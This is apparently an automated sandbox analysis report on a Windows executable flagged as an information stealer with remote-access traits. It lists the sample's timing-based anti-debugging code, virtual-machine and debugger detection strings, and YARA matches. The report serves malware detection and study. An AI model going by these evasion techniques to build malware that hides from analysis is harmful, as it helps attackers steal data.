                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80B68 second address: A80BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e jns 00007F0B44BD79A8h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F0B44BD79AAh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jno 00007F0B44BD79B0h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80BA8 second address: A80BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D33C second address: B1D35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C83h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jc 00007F0B44EA8C76h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D35E second address: B1D364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D15D second address: B1D183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0B44EA8C76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F0B44EA8C7Bh 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D183 second address: B1D195 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D195 second address: B1D1B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0B44EA8C89h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D1B9 second address: B1D1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23302 second address: B23316 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0B44EA8C78h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23316 second address: B2331C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B239C9 second address: B239DF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B44EA8C7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B239DF second address: B239E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B239E5 second address: B239E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B239E9 second address: B23A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0B44BD79A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0B44BD79B6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A0F second address: B23A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A13 second address: B23A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24605 second address: B2460B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2460B second address: B24633 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B44BD79BEh 0x00000008 jmp 00007F0B44BD79B8h 0x0000000d jo 00007F0B44BD79ACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28BEE second address: B28C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F0B44EA8C82h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28C07 second address: B28C18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28C18 second address: B28C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30DA5 second address: B30DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0B44BD79ACh 0x0000000a je 00007F0B44BD79A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30DB5 second address: B30DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0B44EA8C76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30DC1 second address: B30E00 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B44BD79A6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f jnl 00007F0B44BD79A6h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0B44BD79ADh 0x00000020 jmp 00007F0B44BD79B7h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30E00 second address: B30E0A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B44EA8C76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35B14 second address: B35B6E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0B44BD79AEh 0x00000010 jbe 00007F0B44BD79A6h 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b js 00007F0B44BD79C7h 0x00000021 jmp 00007F0B44BD79AAh 0x00000026 jmp 00007F0B44BD79B7h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F0B44BD79ABh 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D85 second address: B43D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D89 second address: B43D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D8D second address: B43D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D95 second address: B43DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0B44BD79A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43DA1 second address: B43DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43DBD second address: B43DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43C66 second address: B43C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B467FE second address: B46802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B463AE second address: B463BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B464FF second address: B46522 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B44BD79A6h 0x00000008 jmp 00007F0B44BD79AAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0B44BD79AFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46522 second address: B46529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46529 second address: B4652F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4652F second address: B46572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007F0B44EA8C87h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 jmp 00007F0B44EA8C85h 0x00000019 ja 00007F0B44EA8C76h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5512E second address: B55133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B553E6 second address: B5540B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0B44EA8C83h 0x00000011 jp 00007F0B44EA8C76h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5540B second address: B55415 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55415 second address: B5541B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55B29 second address: B55B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnp 00007F0B44BD79A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55DC9 second address: B55DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57946 second address: B57956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79AAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B591F2 second address: B591F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B591F6 second address: B591FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B591FF second address: B59205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59205 second address: B59239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79B4h 0x00000009 jo 00007F0B44BD79A6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0B44BD79B1h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59239 second address: B5923D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59098 second address: B590B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F0B44BD79B1h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A891 second address: B5A8AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0B44EA8C7Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8AA second address: B5A8AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D136 second address: B5D140 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B44EA8C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D140 second address: B5D145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F00B second address: B5F02B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B44EA8C76h 0x00000008 jo 00007F0B44EA8C76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0B44EA8C7Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F02B second address: B5F02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F02F second address: B5F041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F041 second address: B5F052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ACh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5EBB7 second address: B5EBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60BEB second address: B60BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8489E second address: A848A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8D1AF4, instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: A9ED3C, instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AFC7ED, instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000, name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006838B0: wsprintfA, FindFirstFileA, lstrcat, StrCmpCA, StrCmpCA, wsprintfA, PathMatchSpecA, CoInitialize, CoUninitialize, lstrcat, lstrlen, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, wsprintfA, CopyFileA, __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, DeleteFileA, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00684910: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, CopyFileA, DeleteFileA, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0067DA80: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0067E430: FindFirstFileA, StrCmpCA, StrCmpCA, FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00684570: GetProcessHeap, RtlAllocateHeap, wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, CopyFileA, DeleteFileA, FindNextFileA, FindClose, lstrcat, lstrcat, lstrlen, lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0067ED20: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrlen, DeleteFileA, CopyFileA, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0067BE70: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, StrCmpCA, DeleteFileA, StrCmpCA, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0067DE10: FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006716D0: FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00683EA0: wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0067F6B0: FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00671160: GetSystemInfo, ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1367632682.0000000001314000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1367632682.00000000012E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1367632682.0000000001314000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWI
                Source: file.exe, 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13573)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13570)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13592)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13584)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13624)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006745C0: VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00689860: GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00689750: mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00687850: GetProcessHeap, RtlAllocateHeap, GetUserNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00689600: CreateToolhelp32Snapshot, Process32First, Process32Next, StrCmpCA, CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: cProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00687B90: GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList, GetLocaleInfoA, LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00686920: GetSystemTime, sscanf, SystemTimeToFileTime, SystemTimeToFileTime, ExitProcess
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00687850: GetProcessHeap, RtlAllocateHeap, GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00687A30: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.670000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.670000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
